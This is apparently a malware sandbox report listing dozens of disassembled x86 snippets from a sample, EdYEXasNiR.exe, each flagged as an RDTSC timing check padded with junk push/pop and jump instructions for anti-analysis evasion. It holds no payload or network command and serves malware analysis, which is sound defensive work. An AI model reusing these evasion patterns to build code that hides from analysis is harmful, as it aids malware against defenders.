                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F337FD second address: F33820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007FD358DA46E5h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F33820 second address: F33826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E9F441 second address: E9F445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E9F445 second address: E9F44B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F32FD1 second address: F32FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD358DA46D6h 0x0000000a push edx 0x0000000b jno 00007FD358DA46D6h 0x00000011 jnl 00007FD358DA46D6h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b jns 00007FD358DA46D6h 0x00000021 pop esi 0x00000022 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F33126 second address: F3312C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3312C second address: F33130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F33130 second address: F33136 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F33136 second address: F33140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F33140 second address: F33144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3342C second address: F33430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F39F38 second address: F39F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3A4DC second address: F3A4F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358DA46E8h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3A4F8 second address: F3A4FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3A4FC second address: F3A502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3A502 second address: F3A50E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD358ED10F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3A50E second address: F3A512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AAAD second address: F3AAB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AAB3 second address: F3AACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007FD358DA46D6h 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 jng 00007FD358DA46DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AACC second address: F3AAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AAD4 second address: F3AADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AADA second address: F3AADE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3AADE second address: F3AAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD358DA46D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FD358DA46D6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3ADC4 second address: F3ADCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3ADCB second address: F3ADEA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007FD358DA46DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007FD358DA46D6h 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B0E5 second address: F3B0EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B0EA second address: F3B0F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B0F2 second address: F3B11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jno 00007FD358ED10FEh 0x0000000e jmp 00007FD358ED10FDh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B411 second address: F3B42D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FD358DA46D6h 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B6BC second address: F3B6C4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F3B6C4 second address: F3B6CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FD358DA46D6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E93824 second address: E93828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E93828 second address: E9383C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FD358DA46DAh 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E9383C second address: E93864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jp 00007FD358ED10F6h 0x0000000b je 00007FD358ED10F6h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD358ED10FAh 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007FD358ED10F6h 0x00000023 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E93864 second address: E9386C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E9386C second address: E93871 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F41EE5 second address: F41EF5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD358DA46D6h 0x00000008 jno 00007FD358DA46D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F41EF5 second address: F41EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F41EFB second address: F41F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F41F01 second address: F41F05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F45887 second address: F4589E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358DA46DFh 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F4589E second address: F458A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F458A4 second address: F458AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F458AB second address: F458BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FD358ED10F6h 0x0000000a jmp 00007FD358ED10FAh 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F458BF second address: F458C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F45B65 second address: F45B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F45B69 second address: F45B83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F45B83 second address: F45BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358ED1109h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F45BA6 second address: F45BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358DA46E9h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F4C5AD second address: F4C5C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD358ED1101h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F4C720 second address: F4C724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F4DB26 second address: F4DB2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F51C6F second address: F51C91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FD358DA46EAh 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F58E5E second address: F58E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FD358ED10F6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F58E6D second address: F58E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F69C70 second address: F69C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E8E761 second address: E8E765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F6970F second address: F6971B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F6971B second address: F6971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F6971F second address: F69723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F69723 second address: F69729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F69729 second address: F69731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F69731 second address: F69735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: E8E747 second address: E8E761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358ED10FAh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FD358ED10F6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F6E7E9 second address: F6E7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F6E7EF second address: F6E7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F77B51 second address: F77B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F77B55 second address: F77B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F8076C second address: F80770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F80770 second address: F80774 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F145 second address: F7F14B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F14B second address: F7F177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnl 00007FD358ED10F6h 0x00000011 jnl 00007FD358ED10F6h 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F3F9 second address: F7F3FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F6A4 second address: F7F6AE instructions: 0x00000000 rdtsc 0x00000002 js 00007FD358ED10FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F7ED second address: F7F813 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD358DA46E4h 0x00000010 ja 00007FD358DA46D6h 0x00000016 popad 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F813 second address: F7F82D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD358ED110Ch 0x00000008 jmp 00007FD358ED1100h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F82D second address: F7F839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FD358DA46D6h 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F839 second address: F7F83D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F83D second address: F7F854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jnc 00007FD358DA46D6h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F854 second address: F7F858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620EC3 second address: 5620ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358ED10FCh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620ED3 second address: 5620ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620ED7 second address: 5620F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD3C9934B9Ch 0x0000000e pushad 0x0000000f call 00007FD358ED10FDh 0x00000014 movzx esi, dx 0x00000017 pop edx 0x00000018 pushfd 0x00000019 jmp 00007FD358ED10FAh 0x0000001e and eax, 77C204A8h 0x00000024 jmp 00007FD358ED10FBh 0x00000029 popfd 0x0000002a popad 0x0000002b cmp dword ptr [ebp+08h], 00002000h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push ebx 0x00000036 pop esi 0x00000037 mov cx, dx 0x0000003a popad 0x0000003b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630A56 second address: 5630A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630A5A second address: 5630A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630A60 second address: 5630A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46E2h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630A76 second address: 5630AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007FD358ED10FDh 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 jmp 00007FD358ED1103h 0x00000018 mov bl, ch 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD358ED1107h 0x00000023 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630AC1 second address: 5630B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007FD358DA46DEh 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 jmp 00007FD358DA46E0h 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B0A second address: 5630B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B0E second address: 5630B14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B14 second address: 5630B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B1A second address: 5630B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B1E second address: 5630B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B22 second address: 5630B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD3C9801F63h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD358DA46E8h 0x00000015 and eax, 2CA06DE8h 0x0000001b jmp 00007FD358DA46DBh 0x00000020 popfd 0x00000021 popad 0x00000022 cmp dword ptr [760F459Ch], 05h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD358DA46E1h 0x00000030 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B77 second address: 5630B87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358ED10FCh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630B87 second address: 5630B9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD3C9819FDEh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
